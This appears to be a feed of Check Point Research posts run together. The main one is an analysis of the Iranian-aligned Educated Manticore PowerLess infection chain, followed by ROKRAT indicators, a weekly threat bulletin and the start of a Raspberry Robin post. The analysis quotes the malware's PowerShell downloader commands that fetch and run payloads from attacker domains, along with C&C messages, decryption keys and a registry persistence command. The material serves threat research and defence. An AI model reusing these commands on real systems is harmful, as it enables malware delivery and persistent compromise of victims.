We also analyzed several newer samples of ROKRAT and described the commands that it accepts, which helps us shed some light on the malware’s internal mechanisms and capabilities. Check Point Research continues to track this tool, which is imperative as APT37 is still using it while also continuing to alter the infection chains.

This report, together with other recent reports on ROKRAT versions for Android and macOS, shows that APT37 continues to pose a considerable threat, launching multiple campaigns across the platforms and significantly improving its malware delivery methods.

Check Point Customers remain protected:

Threat Emulation provides Comprehensive coverage of attack tactics, file-types, and operating systems, powered by ThreatCloud AI- the brain behind all of Check Point’s Security. Every file received via email or downloaded by a user through a web browser is sent to the Threat Emulation sandbox to inspect for malware.

Harmony Endpoint provides comprehensive endpoint protection at the highest security level, including Full attack containment and remediation to quickly restore any infected systems, High catch rates and low false positives ensuring security efficacy and effective prevention.

TE Protections:

Trojan.Wins.SusLNK.A

Trojan.Wins.SusLNK.B

Injector.Win.RemoteThread.A

Technique.Win.MalOfficeVBA.la.D

Exploit.Win.MalChildren.la.A

HEP Protections:

Technique.Win.EmbedExeLnk.A

Technique.Win.EmbedExeLnk.B

IOCs

File Hashes

URLs

• hxxps[://]api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBaFFNUDZlZzhhUkZiN0xVMUNPQ2YzeE5vVFU_ZT1wZ2liaUM/root/content
• hxxps[://]api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBdTJteTF4aDZ0OFhkSUpseW14b21abFd2WW8_ZT15SjJTSkk/root/content
• hxxps[://]api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBdTJteTF4aDZ0OFhnUjJNem1zOG5oUndvLTZCP2U9akhIQzZ5/root/content
• hxxps[://]api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBalFOTHZFRV9DVU9iUFdnLXhPZG8xRXFYckU_ZT1BM1QwV2Q/root/content
• hxxps[://]api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSjE/root/content
• hxxps[://]1erluw[.]bl[.]files[.]1drv[.]com/y4mjq91jEOFfIt8XWokhkvDA3nd2tPKC9x6YXe5KPoia1IoxaHAT0f4N[…]8IqzILVZkrM48fYGI1jkeYjBkceuEgARw-IRenUX4NuenWy_g/my[.]jpg
• hxxps[://]u9izog[.]dm[.]files[.]1drv[.]com/y4mKSGc6jShxeCkGYNOnZdeG42N9DXsT4dFh5t6umtqb8bI9VePGNlZG7GP_-K9ly6IW0xeiUqMR8o6Sk9pGqnPraGVk-PxQce9pcUKcGPoKvXYaPqoiBNLDb3KK94OjeEV0RiejfEGjZ1ccTQqeWZZ0_DnN4T5NGFZRCkc4ZvlJERfXrb5JgWm1U3gC4leSiTrTtV12NtA3UrdgsHv46eCoQ/AutumnPark
• hxxps[://]qb3oaq[.]bl[.]files[.]1drv[.]com/y4mHRkXCvSNkEazYL8KsgjxXW3y4EfgcyTsS_t5Wi6fefz383ova6apylWD0q0dsmeV2UbuXHYDd_IbfVazPybUB72j-fJ8cPvgLhX1dYRSVWpxXnpKq1GiHngnCioOASAeaS33ztlC74MpGEWsDuNksijGCqmtnIelhg-FBefDcwLwqsbCH01dRolRMhazBj1ZxYizw_CyFwdRbApbmUCNOQ/dragon32[.]zip
• hxxps[://]link[.]b4a[.]app/download[.]html?search=cHJvamVjdHMgaW4gTGlieWEuemlw
• hxxps[://]docx1[.]b4a[.]app/download[.]html?id=88&search=tuh3m0xez3npqzr4terfd2zhsnzasgt1zedgawjhvxflazkwyudwewzieglimli1tg5safltegw=
• hxxps[://]naver-file[.]com/download/list[.]php?q=e1&18467=41

Domains

• link[.]b4a[.]app
• docx1[.]b4a[.]app
• naver-file[.]com
• nate-download[.]com
• daum-store[.]com
• naver-storage[.]com

The post Chain Reaction: ROKRAT’s Missing Link appeared first on Check Point Research.

Key Findings:

• In this report we reveal new findings related to Educated Manticore, an activity cluster with strong overlap with Phosphorus, an Iranian-aligned threat actor operating in the Middle East and North America.
• Like many other actors, Educated Manticore has adopted recent trends and started using ISO images and possibly other archive files to initiate infection chains. In the report we reveal Iraq-themed lures, most likely used to target entities in Israel
• The actor has significantly improved its toolset, utilizing rarely seen techniques, most prominently using .NET executables constructed as Mixed Mode Assembly – a mixture of .NET and native C++ code. It improves tools’ functionality and makes the analysis of the tools to be more difficult.
• The final executed payload is an updated version of the Implant PowerLess, previously tied to some of Phosphorus ransomware operations.

Introduction

In this report, Check Point research reveals new findings of an activity cluster closely related to Phosphorus. The research presents a new and improved infection chain leading to the deployment of a new version of PowerLess. This implant was attributed to Phosphorus in the past, an Iran-affiliated threat group operating in the Middle East and North America. Phosphorus has been linked to a wide variety of activities, ranging from ransomware to spear-phishing of high-profile individuals.

While the new PowerLess payload remains similar, its loading mechanisms have significantly improved, adopting techniques rarely seen in the wild, such as using .NET binary files created in mixed mode with assembly code. The newly discovered version is likely intended for phishing attacks focused around Iraq, using an ISO file to initiate the infection chain. Other documents inside the ISO file were in Hebrew and Arabic languages, suggesting the lures were aimed at Israeli targets.

As the details of this attack were uncovered, two other, very similar lures have drawn our research team’s attention. Based on internal naming conventions and previous submissions, we assume with medium confidence that those lures were part of testing efforts of the same threat actor.

Check Point Research tracks this activity cluster as Educated Manticore.

PowerLess Infection Chain Analysis

High-level Overview

Educated Manticore deployment of PowerLess is a multi-staged process that contains several custom components:

• Lure (Iraq development resources.iso as well as the documents within it)
• Initial Loader (Iraq development resources                    .exe, later changed to syscall01.exe)
• Downloader (stored encrypted within zoom.jpg)
• PowerLess Loader (syscall02.exe, downloaded by zoom.jpg)
• PowerLess Payload (stored encrypted within asdfg, downloaded by zoom.jpg).

The complete chain is depicted below:

ISO and Lures

The file Iraq development resources.iso was submitted to VirusTotal by two submitters from Israeli IP addresses. At the time of this writing, it has 0 detections, possibly affected by its large size (18.5 MB). It is worth noting that the initial loader embedded in the ISO file also has a low detection rate.

The ISO file is designed to deceive the user. Its structure is unique, containing a relatively large number of files in three hidden folders with names containing non-breaking spaces, in addition to the initial loader, disguised as a folder as well.

A summary of the files in the ISO image:

Of the three folders, the first contains an encrypted version of a custom downloader stored as zoom.jpg. The second and third are identical in terms of subfolder and file names, while one contains actual PDF lures and the other contains the same files XORed with ‘0x0a’ in the decimal format. The lures were divided into subfolders by language, containing files in Arabic, English, and Hebrew. All of them are PDF files with academic content about Iraq, suggesting the targets might have been academic researchers.

What might appear in the picture as a fourth folder is actually the initial loader, a PE file named Iraq development resources                    .exe that is disguised as an empty folder, prompting users to click it without noticing its extension.

Initial Loader

Iraq development resources.exe is the first malicious component that initiates the infection chain upon execution. It is a 64-bit PE designed to decrypt and execute a custom downloader from the file zoom.jpg that is embedded in the ISO file as well, using the open-source project RunPE-In-Memory.

The Initial loader itself is obfuscated, most likely with compiler-generated pattern-based obfuscation. In this case, the obfuscation resulted in about 1282 blocks full of junk code. Appendix “A” provides a dedicated IDAPython script we created to de-obfuscate the code.

To make the analysis even more difficult, the actors have implemented an additional layer of 13 customized string-decryption functions that are based on TEA32 (Tiny-Encryption-Algorithm), where each function uses a different decryption key and is implemented to work on a certain length of the string. Appendix “B” provides a dedicated IDAPython script we created to decrypt the code.

Upon execution, the initial loader:

1. Creates the directory C:\Users\User\AppData\Local\SystemCall.
2. Copies itself with the name syscall01.exe to the above folder. The malware also attempts to copy zoom.jpg to the same folder, but fails because of improper handling of spaces.
3. Constructs the path to the file zoom.jpg, stored in a non-breaking space folder (\\\xA0) in the ISO image, as depicted below:

4. Decrypts the contents of the downloader to memory from zoom.jpg using AES-256-CBC with the KEY qweasdzxcrtyfghvqweasdzxcrtyfghv and IV ddssajliodqsdedw. The decryption is implemented in a custom version of RunPE-In-Memorybuilt to handle the encrypted payload, map it to memory, and execute it at its entry point, as seen below, compared to the original project code.

Downloader

The decrypted file extracted from zoom.jpg is 64-bit PE with the main purpose of downloading and executing the next stages. The downloader is obfuscated similar to the initial loader, affected with the same compiler-generated pattern-based obfuscation, and can also be de-obfuscated with the same script provided in Appendix “A”. The string decryption is also implemented similarly, but this time using 16 different customized string-decryption functions based on TEA32 (Tiny-Encryption-Algorithm).

After it is loaded into memory and run, the downloader:

1. Starts Explorer in one of the “iso” subfolders, imitating a real folder opening.
2. Creates a persistence for syscall01.exe (the newly created copy of the initial loader) by setting the registry value HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell. The persistence is configured only if the malware does not run from the AppData directory and if syscall01.exe does not exist in the folder C:\Users\User\AppData\Local\SystemCall.

• In the flow described above, this persistence is not configured, because the syscall01.exe is created in a previous stage exactly in the folder C:\Users\User\AppData\Local\SystemCall, indicating of possible different execution flow use-case of this downloader.

3. Downloads the PowerLess loader through a POST request to an attacker-controlled domain https://subinfralab[.]info/qaMspFbEmg, saving the file as C:\Users\User\AppData\Local\SystemCall\syscall02.exe.
4. Downloads the encrypted PowerShell payload content through a POST request to the same server https://subinfralab[.]info/hgAdDiLmnB, saving as C:\Users\Public\asdfg.

5. Executes the PowerLess loader through the command explorer C:\Users\User\AppData\Local\SystemCall\syscall02.exe

PowerLess Loader

The downloaded executable file syscall02.exe, dubbed as the “PowerLess Loader”, is a 64-bit .NET PE constructed as Mixed Mode Assembly. It is designed to load the encrypted PowerShell script backdoor asdfg, dubbed as “PowerLess Payload”, decrypt it, and invoke it in memory. In addition, it also performs a few evasion techniques, such as AMSI Bypass and ETW Bypass.

Right upon the first inspection of the PE structure, a few characteristics point to this .NET sample being constructed as Mixed-Mode Assembly. The “IL Only” flag inside the .NET directory flags is not checked. This means that the sample could contain not only IL code, but also unmanaged code. In addition, the Import Directory contains a set of entries for native libraries.

Reverse-engineering a mixed-mode assembly code is different from pure .NET assembly code, requiring both native and IL code disassemblers. The native CRT entry point mainCRTStartup()redirects the execution back to the managed code – directly to the method main(), where all logic resides. The construction of certain strings is the first logic observed in this method. Recreating these strings reveals functionality related to the evasion techniques AMSI Bypass and ETW Bypass, as well as keys and paths required to invoke the PowerLess payload later.

Following the execution of the bypasses mentioned above, the loader reads the contents of the file stored in C:\Users\Public\asdfg, previously downloaded by the downloader. For the decryption, AES-128-ECB with the previously constructed key {}nj45kdada0slfk is used. Once the PowerLess Payload asdfg is decrypted, it is executed in-memory in the context of syscall02.exe, using an instance of class System.Management.Automation.PowerShell and the applicable methods.

PowerLess Payload

The final payload is a new version of the previously reported PowerLess PowerShell payload. This version, however, is more mature, supporting a much wider set of commands. It contains an internal configuration, including its Command and Control server (C&C), using the previously mentioned attacker-owned domain subinfralab[.]info.

A short inspection of the supported commands in the newer version in comparison to the ones in the previously reported sample provides insight into the significant development the payload has gone through. Among the new features – showing the list of installed programs, showing the list of processes, showing a list of files, stealing user data from the Telegram desktop app, and taking screenshots.

Among its capabilities, PowerLess can download extra modules, including a keylogger, browser information stealer, and a surroundings sound recorder. Previous reports have linked a similar sound recording tool to PowerLess actors, but since then, they embed it within the malware and activate it upon the “sound” command from the C&C server. The tool is downloaded from the server and saved as C:\Windows\temp\ugt\so.zip.

PowerLess C&C communication to the server is Base64-encoded and encrypted after obtaining a key from the server. To mislead researchers, the threat actor actively adds three random letters at the beginning of the encoded blob.

The backdoor starts by initiating a request to receive the communication encryption key from the C&C server:

{"BotId":"1D1FB0BB21B94FC0B017A4DADA231E17","GroupName":"SLM","type":"fetchkey"}

In response, the C&C server sends a key and a “first-time” flag:

{ "Key" : "X9w4tpLJErwNCKYA", "first" : "1" }

In the first run, the PowerShell backdoor enumerates the system and sends recon data nested in “info”, including the computer name, username, operating system, IP address, installation path, computer manufacturer, and security software installed:

{"BotId":"1D1FB0BB21B94FC0B017A4DADA231E17", "type":"sendinfos", "info":<Encrypted and encoded information in the JSON format>}

In addition, the backdoor sends the list of processes and programs from the victim’s computer. After sending the relevant information, the backdoor begins to check periodically every 48 to 72 seconds for commands from the C&C server using the fetchcommand request:

{"type":"fetchcommand","BotId":"1D1FB0BB21B94FC0B017A4DADA231E17"}

The first command received from the C&C server achieves persistence on the victim’s computer by adding the key shell with the value syscall02.exe to the winlogon registry key. The persistence command is followed by a command to get logical disk names. The commands, separated by **, are sent immediately after the connection is established, which leads us to believe that it is an automated process:

{"Cid" : "29" , "Command" : "reg add 'hkcu\software\microsoft\windows NT\currentversion\winlogon' /v 'Shell' /d 'explorer.exe, C:\Users\admin\AppData\Local\SystemCall\syscall02.exe' -f" , "CommandType" :"Command"}

{"Cid" : "30" , "Command" : "wmic logicaldisk get name" , "CommandType" :"Command"}

The Educated Manticore Apprentice

While analyzing the newly discovered PowerLess lures, the CPR team came across a different intrusion set that shares several characteristics with the attack chain described above. This intrusion set consists of two archive files:

1. iraq-project.rar contains the LNK file Iraq-project.lnk and the folder Other-files. This folder contains several PDF files with an Iraq-related theme and a DLL file stored as a false JPG file.
2. SignedAgreement.zip contains an LNK file SignedAgreement.lnk

Although there is no clear technical overlap between the PowerLess activity and this intrusion set with the two archive files, they are likely related. Among the similarities between the two different intrusion sets:

• Both intrusion sets are themed around Iraq and utilize the same PDF file, contained in the archives and the ISO image – Governance_and_Development_in_Iraq.pdf.
• Two different submitters, both of them from Israel, have submitted files related to the ISO and the archives intrusion sets, in proximity, indicating the two submitters had access to both sets.
• Both campaigns utilize the open-source project RunPE-In-Memory.

It is evident that the second campaign is incomplete and might have been part of a personal project conducted by its developer, as indicated by the PDB path D:\Personal Cmp\personal project\WorkSpace\PROJREV\aa\ that appears in some of the samples. It is likely that this “personal project” was developed in the same context of the PowerLess lure described above and might have taken inspiration from it or influenced it.

Infection Chain – iraq-project.rar

The LNK file stored in the RAR archive executes a PowerShell script that extracts the XORed PE file from the LNK file and runs it. This PE file then downloads two files from the C&C server. At the time of our analysis, the payloads were no longer available for download. Other artifacts retrieved throughout the analysis of the second lure, SignedAgreement.zip, as well as additional files found on VirusTotal, lead us to believe that one downloaded file is the backdoor, while the second file is used to run it in memory.

LNK Analysis

Clicking the malicious LNK file triggers a PowerShell script that extracts a PE file embedded within it, saving it to the %temp% folder. The script then executes the extracted file. Additionally, the file Governance_and_Development_in_Iraq.jpg is saved to the %temp% folder as Newtonsoft.Json.dll

$lnkpath = Get-ChildItem *.lnk | where-object {$_.length -eq 0x00005A54} | Select-Object -ExpandProperty Name; $file = gc $lnkpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x77 }; $path = 'C:\Users\admin\AppData\Local\Temp\tmp' + (Get-Random) + '.exe'; sc $path ([byte[]]($file | select -Skip 003156)) -Encoding Byte; $bytes2 = gc .\Other-files\Governance_and_Development_in_Iraq.jpg -Encoding Byte; $path2 = 'C:\Users\admin\AppData\Local\Temp\' + 'Newtonsoft.Json' + '.dll'; sc $path2 ([byte[]]($bytes2)) -Encoding Byte; & $path;

tmp1940166302.exe

tmp1940166302.exe runs a PowerShell script to download two files from the C&C server and executes them. It is worth noting that the file names change randomly with each EXE run.

/c powershell -WindowStyle hidden  $path = 'C:\Users\User\AppData\Local\Temp\s6b4.0.pdf'; $wc = New-Object System.Net.WebClient; $bytes = $wc.DownloadData('https://deersharpfork.info/dw85fgxtvzq/download/i/34624051816246d4a1a7f225d966d139/7e58169ee59d46e7a2be023e728c6205.jpg'); sc $path ([byte[]]($bytes)) -Encoding Byte; & C:\Users\User\AppData\Local\Temp\s6b4.0.pdf
/c powershell -WindowStyle hidden  $path = 'C:\Users\User\AppData\Local\Temp\s6b4.1.exe'; $wc = New-Object System.Net.WebClient; $bytes = $wc.DownloadData('https://deersharpfork.info/dw85fgxtvzq/download/f/bb14611f7aae441fb78f2ca919b800b5/7e58169ee59d46e7a2be023e728c6205'); for($i = 0; $i -lt $bytes.count; $i++) {$bytes[$i] = $bytes[$i] -bxor 0x25 }; sc $path ([byte[]]($bytes)) -Encoding Byte; ^& C:\Users\User\AppData\Local\Temp\s6b4.1.exe;

The file PDB path suggests it might have been part of a personal project:

D:\Personal Cmp\personal project\WorkSpace\PROJREV\aa\ImageLoderFinal\x64\Release\ImageLoderFinal.pdb.

Pivoting from this path, three additional samples surfaced, all named AgentFinal.exe. These samples were all uploaded to VirusTotal on the same day and are different versions of the same payload. The payload seems to be a relatively immature version of an implant, only capable of communicating with the C&C server and executing commands.

The domain used in the payload, blackturtle.hopto[.]org, resolves to the same IP address as the domain deersharpfork[.]info that was used in the infection chain. Furthermore, the AgentFinal.exe payload uses the Newtonsoft.Json.dll library from the original archive.

Based on this information, it is likely that the final payload in this infection chain is a .NET payload with similar capabilities to AgentFinal.exe.

SignedAgreement.zip

The additional archive found closely resembles Iraq-project.rar in terms of its infection chain and implementation, with the only exception being the use of a DLL file instead of an EXE file. Nevertheless, both PE files have the same objective of downloading two files from the C&C server.

Similar to Iraq-project.rar, the final payloads for this infection chain were not available at the time of our analysis. However, one of the downloaded files, wmaess.exe, was submitted to VirusTotal. This file is utilized to run the PE file in memory. When executed by the DLL, it receives the second downloaded file from the C&C server, WinMAPI.exe, as an argument.

The samples within this archive are reaching out to the same C&C server – deersharpfork[.]info.

Attribution

Since 2021, a new cluster of activity with clear ties to Iran has caught the attention of the Threat Intelligence community. The aggressive nature of the new threat, in combination with their ties to ransomware deployments, led to a thorough analysis of its activities. It was commonly called Nemesis Kitten, TunnelVision or Cobalt Mirage.

What started as an extremely loud campaign, targeting networks opportunistically, was soon exposed as tied to previously reported Iranian threat actors, most prominently with those who align to some extent with APT35, Charming Kitten, or Phosphorus. Although different in nature and targeting, it shared some characteristics with the well-known actors, including infrastructure, indicating a possible common organization affiliation.

As the activity evolved, the ties between the different clusters became harder to untangle. While the two ends on the spectrum of those activities differ significantly, not once has the threat intelligence community stumbled upon an activity that does not easily fit the known clusters. Our previous report described one of those samples and the overlaps between the Log4J exploitation activity to an Android app previously tied to APT35.

Because we have no sufficient knowledge to place the activities around the PowerLess backdoor in this complex puzzle, we have decided to track this activity separately based on a new naming convention adopted by Check Point Research. According to the new convention, labeling threats as mythical creatures, Iranian-aligned threats are Manticores.

Because the lures in the activity described in this report were academic in nature and because overlapping activities often pursue similar targets, we have decided to name this actor Educated Manticore.

Conclusion

In this report, we analyzed newly discovered infection chains attributed to Educated Manticore, a threat actor aligned with the Iranian state interests. Based on Check Point Research observations, as demonstrated in this report, Educated Manticore continues to evolve, refining previously observed toolsets and delivering mechanisms.

Analysis of the new PowerLess variant suggests the actor adopts popular trends to avoid detection, such as using archive files and ISO images. In parallel to adopting these trends, they keep developing custom toolsets using advanced techniques, such as .NET binaries using Mixed Mode Assembly.

The variant described in this report was delivered using ISO files, indicating it is likely meant to be the initial infection vector. Because it is an updated version of previously reported malware, PowerLess, associated with some of Phosphorus’ Ransomware operations, it is important to note that it might only represent the early stages of infection, with significant fractions of post-infection activity yet to be seen in the wild.

IOCs

C&C

subinfralab[.]info
deersharpfork[.]info
blackturtle.hopto[.]org

Hashes

Archives:

3e1ed006e120a1afaa49f93b4156a992f8d799b1888ca6202c1098862323c308 29318f46476dc0cfd7b928a2861fea1b761496eb5d6a26040e481c3bd655051a 13bab4e32cd6365dba40424d20525cb84b4c6d71d3c5088fe94a6cfe07573e8e 6e842691116c188b823b7692181a428e9255af3516857b9f2eebdeca4638e96e bc8f075c1b3fa54f1d9f4ac622258f3e8a484714521d89aa170246ce04701441 706510916cfc7624ec5d9f9598c95570d48fa8601eecbbae307e0af7618d1460

PE files:

e5ba06943abb666f69f757fcd591dd1cceb66cad698fb894d9bc8911282198c4 97a615e69c38db9dffda6be7c11dd27547ce4036a4998a1469fa81b548c6f0b0 e5016dfeae584de20a90f1bef073c862028f410d5b0ae4c074a696b8f8528037 5704bc31061c7ca675bb9d56b9b56a175bf949accf6542999b3a7305af485906 4fcde8ec5983cf1465ff7dbcd7d90fcd47d666b0b8352db1dcd311084ed1b3e8 7cc9d887d47f99ca37d2fee6171067df70b4417e96fdb661b9fef697124444cc bdb2a12f2f84c3742240b8b9e1d6638a73c6b8752aff476051fe33a0bb408010 5d216f5625caf92d224200647147d27bb79e1cff6c8a9fbcac63f321f6bbf02b 62d0b8b5d4281ce107c43d36f222680b0cc85844b8973b645095ccdfb128454d

LNK

1672a14a3e54a127493a2b8257599c5582204846a78521b139b074155003cba4 0f4d309f0145324a6867108bb04a8d5d292e7939223d6d63f44e21a1ce45ce4e

PowerShell

737cb075ba0b5ed6d8901dcd798eecff0bc8585091bc232c54f92df7f9e9e817 cd813d56cf9f2201a2fa69e77fb9acaaa37e64183c708de64cb5cb7c3035a184 c0de9b90a0ac591147d62864264bf00b6ec17c55f7095fdf58923085fe502400 59a4b11b9fb93e3de7c27c25258cec43de38f86f37d88615687ab8402e4ae51e

Appendix A – IDAPython script to de-obfuscate the Educated Manticore binary files

import idaapi, idc, idautils

def NopRange(startEa, endEa):
    for b in range(startEa,endEa):
        idc.patch_byte(b,0x90)
    
def DetectJunkBB(bb: idaapi.BasicBlock):
    global BBJunkCount
    global BBsJunk
    for head in idautils.Heads(bb.start_ea, bb.end_ea):
        if(idc.get_operand_type(head,1) == idc.o_imm and (idc.get_operand_value(head,1) & 0xffffffff) == 0x9e3779b9):
            BBsJunk.append(bb)
            BBJunkCount += 1
            for bbSS in bb.succs():
                if(bbSS.start_ea == bb.start_ea):
                    continue
                           
                if (not [SShead for SShead in idautils.Heads(bbSS.start_ea, bbSS.end_ea) if idc.print_insn_mnem(SShead) == "call"]):
                    BBsJunk.append(bbSS)
                    BBJunkCount += 1
                    return

BBJunkCount = 0
BBsJunk = []
funcs = idautils.Functions()
for funcAddr in funcs:
    func = idaapi.get_func(funcAddr)
    fChart = idaapi.FlowChart(func, None, idaapi.FC_PREDS | idaapi.FC_NOEXT) 
    for bb in fChart:
        DetectJunkBB(bb)

for bb in BBsJunk:
    NopRange(bb.start_ea, bb.end_ea)

print("Cleaned BBs with JUNK code: %d" % (BBJunkCount))

Appendix B – IDAPython script to decrypt the Educated Manticore binary strings

import idaapi, idc, idautils

# "return False" in condition - indicates not to break on BP, if "return True" the BP will break -> use False just for logging
cond = """import idc
RAX = idc.get_reg_value("rax")
RIP = idc.get_reg_value("rip")
decString = idc.get_strlit_contents(RAX,-1, idc.STRTYPE_C16)
if decString == None:
    decString = idc.get_strlit_contents(RAX,-1, idc.STRTYPE_C)
print("Decrypted String: %s  Address:0x%x" % (decString ,RIP))
idc.set_cmt(RIP, str(decString), False)
loc = RIP
comment = str(decString)
cfunc = idaapi.decompile(loc)
eamap = cfunc.get_eamap()
decompObjAddr = eamap[loc][0].ea
tl = idaapi.treeloc_t()
tl.ea = decompObjAddr
commentSet = False
for itp in range (idaapi.ITP_SEMI, idaapi.ITP_COLON):#range to cover different ending - orphans cmts
    tl.itp = itp
    cfunc.set_user_cmt(tl, comment)
    cfunc.save_user_cmts()
    unused = cfunc.__str__()
    if not cfunc.has_orphan_cmts():
        commentSet = True
        cfunc.save_user_cmts()
        break
    cfunc.del_orphan_cmts()
if not commentSet:
    print ("pseudo comment error at %08x" % loc)
return False
"""
decryptionFunctions = [0x14000C650, 0x14000C770, 0x14000C890, 0x14000C9A0, 0x14000CAC0, 0x14002B010, 0x14002B130, 0x14002B250, 0x14002B4F0, 0x14002B5E0, 0x14002B700, 0x140035200, 0x140035320]

for decFunc in decryptionFunctions:
    codeRefs = idautils.CodeRefsTo(decFunc,1)
    for ref in codeRefs:
        ea = idc.next_head(ref)
        idaapi.add_bpt(ea, 0, idaapi.BPT_SOFT)
        bpt = idaapi.bpt_t()
        idaapi.get_bpt(ea, bpt)
        bpt.elang = 'Python'
        bpt.condition = cond
        idaapi.update_bpt(bpt)

The post Educated Manticore – Iran Aligned Threat Actor Targeting Israel via Improved Arsenal of Tools appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 24th April, please download our Threat_Intelligence Bulletin

TOP ATTACKS AND BREACHES

• The American Bar Association (ABA), the largest global association of lawyers and legal professionals, has suffered a data breach with hackers gaining access to older credentials of 1,466,000 members. The breach was first detected on March 17th, 2023, and involved login credentials and salted passwords to ABA’s old website
• Capita, a professional outsourcing company based in London, has provided an update on a recent cyber incident they experienced, acknowledging that data was exfiltrated from their systems one week prior to the outage. The company revealed that approximately 4% of its server infrastructure was accessed by hackers who stole files. The BlackBasta ransomware group, known to operate from Russian-speaking regions, has been identified as the perpetrator of the attack.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat     (Ransomware.Win.BlackBasta) 

• Researchers have discovered that last month’s 3CX Software supply chain attack was allegedly caused by an additional prior supply chain compromise. In that case, suspected North Korean attackers breached the site of stock trading automation company “Trading Technologies”, to push its trojanized software builds, and among other victims to infect 3CX.
• Point32Health, a New England health insurance firm serving over two million people, is grappling with a ransomware attack. Systems are offline, and authorities have been notified. No ransomware group has claimed responsibility.
• Researchers have discovered that an Iranian hacking group, previously known as Phosphorous, and now tracked under the name Mint Sandstorm, is conducting cyberattacks on US critical infrastructure. Mint Sandstorm is believed to be linked to the Iranian government and the Islamic Revolutionary Guard Corps (IRGC).
• Security researchers have recently discovered the presence of Trigona ransomware on inadequately secured MS-SQL servers. Trigona is a relatively new type of ransomware that was first identified in October 2022. Another research team had previously pointed out that Trigona and the CryLock ransomware share certain similarities.

Check Point Threat Emulation provides protection against these threats (Ransomware.Wins.Trigona.A; Trojan.Wins.Crylock.ta.A)

VULNERABILITIES AND PATCHES

• A number of vulnerabilities in Cisco and VMware products have been addressed with critical security updates in order to prevent malicious actors from exploiting them to run arbitrary code on affected systems. The most severe vulnerability is a command injection flaw in Cisco Industrial Network Director (CVE-2023-20036).
• Fortra has published the summary of their investigation of the zero-day remote code execution vulnerability (CVE-2023-0669) in its GoAnywhere MFT tool, actively exploited by ransomware groups to steal sensitive data.

Check Point IPS provides protection against this threat (VER0 GoAnywhere MFT Insecure Deserialization (CVE-2023-0669))

• Oracle has released April’s security patch, which includes fixes for 433 vulnerabilities, including 70 which are considered critical.

THREAT INTELLIGENCE REPORTS

• Check Point Brand Phishing Report for Q1 2023 shows changes in the most imitated brands by cyber criminals. Walmart, a multinational retail giant, took the top spot with 16% of all attempts, climbing from 13th place in Q4 2022 due to a phishing campaign related to a supply system collapse. DHL held onto second place with 13%, followed by Microsoft with 12%.
• The Check Point research team has uncovered new techniques used by the Raspberry Robin malware. These methods include several anti-evasion techniques, obfuscation, and anti-VM measures. The malware also exploits two vulnerabilities in Win32k (CVE-2020-1054 and CVE-2021-1732) in order to elevate its privileges.

Check Point Threat Emulation and IPS provide protection against this threat (Trojan.Wins.RaspberryRobin; Microsoft Win32k Elevation of Privilege (CVE-2021-1732), Microsoft Win32k Elevation of Privilege (CVE-2020-1054))

• Researchers have discovered a macOS malware named RustBucket that communicates with C2 servers and is suspected to be associated with a North Korean state-sponsored threat actor known as BlueNoroff, a sub-group of Lazarus Group.
• The Cybersecurity & Infrastructure Security Agency has released a new Malware Analysis Report on the ICONICSTEALER infostealer. This infostealer has been identified as a variant of malware used in the supply chain attack against 3CX’s Software.

Check Point Threat Emulation provides protection against this threat (InfoStealer.Wins.IconicStealer)

The post 24th April – Threat Intelligence Report appeared first on Check Point Research.

In July 2021, several prominent human rights activists in Azerbaijan received the same phishing email that delivered them spyware, capable of causing significant harm to their personal and professional lives. But that was only the beginning of a story in which the domestic surveillance toolbox is fired in the midst of a small-scale cyber-war in the South Caucasus, the site of one of the most contentious political disputes on the planet.  

The post Operation Silent Watch appeared first on Check Point Research.

Research by: Shavit Yosef

Introduction

During the last year, Raspberry Robin has evolved to be one of the most distributed malware currently active. During this time, it is likely to be used by many actors to distribute their own malware such as IcedID, Clop ransomware and more.

Over time, malware has continued to evolve and escalate the game of cat and mouse. Raspberry Robin, however, has taken this game to the next level with a great number of unique tricks and evasions.

In this research, we examine Raspberry Robin as an example of identifying and evading different evasions. We discovered some unique and innovative methods and analyzed the two exploits used by Raspberry Robin to gain higher privileges showing that it also has capabilities in the exploiting area. 

Anti-debugging and other evasions can be exhausting, and even more when it comes to such obfuscation methods and volume of methods as Raspberry Robin implements.  This research aims to show plenty of methods with explanations of how they work and how to evade those evasions.

Raspberry Robin Overview

Raspberry Robin belongs to the rapidly growing club of malware that really doesn’t want to be run on any VM. It added various evasions in many stages which makes the debugging of this malware a living hell.

Raspberry Robin emerged, last May and was first analyzed by Red Canary. Raspberry Robin was technically well-documented by previous work, see for example avast’s report.

The malware has several entry vectors which lead to the main sample. The most prevalent one is via an LNK disguised as a thumb drive or a network share which launches msiexec.exe that downloads the main component.

This main component is packed with 14 different layers (some of them are identical), while some of them contain evasions and some of them do not. Those stages are stored in memory in a custom format being unpacked and run without the headers section. This makes it difficult to unpack Raspberry Robin layers statically into a standalone PE file. Understanding the custom format and how the loading of each stage works is doable but can be exhausting and it probably will be simpler to just analyze the stages dynamically.

The code in all of the stages is heavily obfuscated, including the main payload itself. What makes the obfuscation even harder, is that Raspberry Robin functions expect an argument that is being used to decrypt all the variables and constants the functions need. The initial argument is hardcoded and then every function gets an argument based on the initial one. This is also important for the flow as the malware uses those variables in order to decide which block of logic to run now. That means, that jumping to a function without knowing the real argument will result in faults.

Raspberry Robin has different ways of how it behaves in case of detecting it is not running on a real victim’s computer:

• Terminate the process
• Enters infinite loop
• Cause a crash – such as in the fifth stage where it uses a different RC4 key to decrypt the next stage in case the malware detects it is not running on a physical machine.
• The most diabolical one – Raspberry Robin decrypts a fake new stage instead the real one, which results in another 3 layers of packers until a fake loader. This loader was mentioned in several blogposts and it loads samples from a domain hardcoded inside. The fake loader can be monitored by detecting that the malware tries to query HKEY_CURRENT_USER\SOFTWARE\Microsoft\Media\Active. Many fake payloads were seen in the wild such as BroAssist and other .NET backdoors.

Evasions walkthrough

